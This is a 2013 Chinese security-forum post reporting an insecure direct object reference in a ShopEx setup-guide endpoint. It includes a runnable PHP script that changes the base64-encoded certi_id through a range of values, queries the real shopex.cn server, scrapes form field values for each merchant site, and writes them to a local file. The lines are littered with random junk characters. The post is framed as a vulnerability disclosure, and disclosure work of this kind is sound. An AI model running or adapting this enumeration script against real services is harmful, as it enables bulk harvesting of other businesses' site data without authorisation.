找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2617|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
2 o( q9 Q1 y% D% M3 A4 c# fShopEx某接口缺陷,可遍历所有网站
5 o  P! _! `' s. E6 S6 n详细说明:9 T% {" q+ I3 v; @4 p1 o
问题出现在shopex 网店使用向导页面 : U: g( f) i. x& ^' d* j: n% f, F
- p+ x% y1 @/ e# i

/ N" a! b) v9 P' b2 f
' k) D: Z3 H' b9 chttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
# d: n2 @8 `% y6 V( ?: S: F1 H; y: f: t. ^" H# G
* A2 O! _- W( e) X
; ~" Q' I8 q) a0 Y& m
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
- N! @3 n/ H; g! y+ v% y* F/ B9 C9 s0 E# f: n) R! v  j

( h9 |: h' |, N( d' d
! k1 |* z" u- E5 f; ?9 D7 k我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 " R% @" l+ V) l5 S* ~5 y' e

0 q, y- n- ]8 ^% f% b% w
0 m+ Z1 ?: e0 d% }6 l8 t  r4 a  k4 ~
<?php
9 a, `" T* w6 s. L& V. r- ]) g
2 J# }' ^; T% @/ o4 P                for ($i=1; $i < 10000; $i++) { //遍历
* i: a- ~$ G; N! }5 e" o, g7 N) Q. Q: ~8 q: D. S( K
                        ShowshopExD($i);8 R7 M+ j8 I, v! T

/ K4 ~0 T- a% p0 o& o+ l( y4 h                }
3 }; M1 Z* z0 @4 g  `
# Q9 E: ?* M% j# q7 t  |" f, r1 V                function ShowshopExD($cid) {# o. p8 E5 M: O: t1 w* Z

0 V' T! f3 K! ]8 m# V& c6 L+ U8 j                $url='http://guide.ecos.shopex.cn/step2.php';
( j1 p. u5 o4 n5 P: i0 K: k/ i9 w; V$ k; w
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');8 j& Q! o& }1 v7 E8 ~$ [. A" X
6 Y) g! K1 S' u6 n+ ~" B% s
        $url = $url.'?refer='.$refer;
% d/ k$ b9 }. r; E+ D9 j# C' F. w( Z. V0 ?
        $ch = curl_init($url);7 C0 N$ |( ~" `
- h6 ?" p, g4 ^$ N) e/ J/ W# k2 [
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
8 h! m0 s/ H) |8 s4 Y% \; V/ |- f9 r+ f) F7 L7 \2 O6 ]: m
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;+ t6 F, A2 g: b% I1 r

6 X# E/ f  ~; ?% e3 R% W9 z; W- v        $result = curl_exec($ch);, m8 ^* V7 e& I4 X1 L

) n. ?( Q7 k5 ~  f; R, Z        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
( z2 C( Z1 S6 w+ n# k: f! i* I9 M+ e0 y/ @8 u8 z
        if(strpos($result,$refer))
5 S6 b" Z. j) n& P9 o
1 }* }8 P! A8 ]+ L$ J- t! K/ P        {+ q1 y1 A8 W7 {- n0 K; t

& _& ]1 q+ \4 [9 D) r8 f                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
& P/ ?+ N% n& g0 x  ~" g# _
3 e: u! _. V( v* v5 _                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
! p$ B- q# M, M. D: |0 g& R
1 C! z: C7 Y6 L! M$ M' ]; j$ r, W                foreach ($value[1] as $key) {4 ^; E" H0 v- p* q
9 r! H8 [* x$ _3 s. s: Q0 z
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);4 J! {1 ]& V" F( [! m9 U' w
7 ]0 `# T) f$ U( l( J) N5 U& ^
                        echo $res[1][0].':'.$res[3][0]."\r\n";& I6 Y. \+ _6 y6 A! U* J
% m3 r0 p" T: H8 {1 M' a, z1 {
                        $col =$res[1][0].':'.$res[3][0]."\r\n";
/ a0 O6 o- @4 P" q, a9 q" ]
6 ?7 `% V+ m$ V                        fwrite($fp, $col, strlen($col));
2 _2 I0 L0 B' r- T
) {/ J# }3 O3 L" o                }
# v2 K- N" ]$ K+ J- K; F
) e. T9 e$ `+ D, N' ~                echo '--------------------------------'."\r\n";. b7 v, n) u8 i5 i, g
# G; }5 ?3 L$ h4 ~
                fclose($fp); ! f* a8 [- m( i2 w; N/ A
6 p. K9 B4 h+ O$ g8 [. i- n5 h8 F0 N& Y" Z
        }
$ e1 D5 T* q% P% O& l$ S3 x3 }
  C/ @2 C+ Q1 b) y' \( K# R        flush();
$ t0 g! C& L. |5 p; c! Y7 g. l
( e* o+ j" _/ ~3 Q% N! m  r2 d        curl_close($ch);. C- ]$ q: h8 g0 }% ^& g2 ^. c) G

* y* @/ S% y$ j3 ]% k: Q                }
& r7 ^4 n3 s& R' c6 p
  U& }0 v$ n; X$ ]8 q& q7 l/ r?>' G: r8 Z) {7 N
漏洞证明:
* k, }  C$ N) I# x6 e  a) X- zhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
. n6 k( O# G# y) [1 S% C+ prefer换成其他加密方式
0 t6 n# F1 p& J3 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表